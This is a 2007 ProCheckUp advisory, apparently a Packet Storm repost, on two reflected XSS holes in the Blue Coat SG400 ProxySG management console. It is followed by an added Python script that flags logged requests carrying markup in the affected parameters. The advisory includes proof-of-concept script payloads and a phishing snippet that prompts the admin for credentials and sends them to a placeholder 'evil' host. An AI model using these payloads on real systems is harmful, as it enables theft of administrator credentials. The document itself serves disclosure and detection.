ProCheckUp Security Advisory 2007.29

01 Nov 2007 00:00:00 | Reported by Adrian Pastor | Type: packetstorm | Source: packetstormsecurity.com

Blue Coat SG400 XSS Vulnerability PR07-2

`PR07-29: Two XSS on Blue Coat ProxySG Management Console  
  
Vulnerability found: 23 July 2007  
  
Vendor informed: 20 August 2007  
  
Vulnerability fixed: 29 October 2007  
  
Advisory publicly released: 1 November 2007  
  
Severity: Medium  
  
Description:   
  
Blue Coat SG400 is vulnerable to a couple of XSS holes.  
  
Vulnerable server-side script / unfiltered parameter: '/Secure/Local/console/install_upload_action/crl_format' / 'name'  
  
Vulnerable server-side script / unfiltered parameter: '/Secure/Local/console/install_upload_from_file.htm' / 'file'  
  
Notes:  
  
The admin user needs to be authenticated (HTTP basic authentication) for the injected JavaScript to run.  
  
  
Successfully tested on:  
  
Model: Blue Coat SG400   
Software SGOS 4.2.1.6   
Software Release ID: 25173   
  
  
Proof of concept #1:  
  
https://target:8082/Secure/Local/console/install_upload_action/crl_format?name="<script>alert("XSS")</script>%00  
  
Injected payload:  
  
"<script>alert("XSS")</script>%00  
  
Proof of concept #2:  
  
https://target:8082/Secure/Local/console/install_upload_from_file.htm?file=<script>alert("XSS")</script><!--  
  
Injected payload:  
  
<script>alert("XSS")</script><!--  
  
  
A neat payload to inject instead of an alert() box would be a phishing attack which would forward the username and password to a third-party site (the code could be inserted from a third-party site).   
  
i.e.:  
  
<script>  
do {  
a=prompt("Blue Coat SG400: an error has occurred\nPlease enter your USERNAME","");  
b=prompt("Blue Coat SG400: an error has occurred\nPlease enter your PASSWORD","");  
}while(a==null || b==null || a=="" || b=="");  
  
alert("owned!:"+a+"/"+b);window.location="http://evil/?u="+a+"&p="+b  
</script><!--  
  
  
Consequences:   
  
An attacker may be able to cause execution of malicious scripting code in the browser of a Blue Coat SG400 admin who clicks on a link to a Blue Coat ProxySG Management Console. Such code would run within the context of the target domain.  
  
This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e.: basic auth credentials stolen through a phishing attack as described in the Proof of Concept) to unauthorised third parties.  
  
Fixed in:  
  
4.2.6.1, 5.2.2.5  
  
  
References:   
  
http://www.procheckup.com/Vulnerability_2007.php  
http://www.bluecoat.com/support/securityadvisories/advisory_cross-site_scripting_vulnerability  
  
  
Credits: Adrian Pastor from ProCheckUp Ltd (www.procheckup.com)  
`
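
Added example (not part of the ProCheckUp advisory): a check that flags logged requests carrying markup in the two unfiltered parameters named above, useful for reviewing access to a console that has not yet been upgraded to a fixed release. The paths and parameter names come from the advisory; the request-line log format, the character list and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Endpoint -> unfiltered parameter, both taken from the advisory.
WATCHED = {
    "/Secure/Local/console/install_upload_action/crl_format": "name",
    "/Secure/Local/console/install_upload_from_file.htm": "file",
}
# Assumption: a legitimate CRL name or file name never contains markup
# delimiters, quotes or a NUL byte, so any of these is worth an alert.
SUSPICIOUS = re.compile(r"[<>\"'\x00]")

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded markup is still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def check_request(target):
    """Return (path, param, decoded_value) for a suspicious request, else None."""
    parts = urlsplit(target)
    param = WATCHED.get(unquote(parts.path))
    if param is None:
        return None
    for pair in parts.query.split("&"):
        key, _, raw = pair.partition("=")
        value = decode_fully(raw)
        if decode_fully(key) == param and SUSPICIOUS.search(value):
            return (parts.path, param, value)
    return None

def scan(log_lines):
    """Check the request target of each 'METHOD target HTTP/x' line."""
    targets = (f[1] for f in map(str.split, log_lines) if len(f) >= 2)
    return [hit for hit in map(check_request, targets) if hit]

# Constructed sample request lines (not from a real device log).
SAMPLE_LOG = [
    "GET /Secure/Local/console/install_upload_action/crl_format?name=%22%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%00 HTTP/1.1",
    "GET /Secure/Local/console/install_upload_from_file.htm?file=%253Cscript%253Ealert(1)%253C/script%253E%3C!-- HTTP/1.1",
    "GET /Secure/Local/console/install_upload_from_file.htm?file=crl-2007.pem HTTP/1.1",
]
if __name__ == "__main__":
    for path, param, value in scan(SAMPLE_LOG):
        print(f"ALERT {path} {param}={value!r}")
```

A hit only shows that a crafted link was requested; correlate it with the Referer and the authenticated admin session to judge whether the script could have run.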
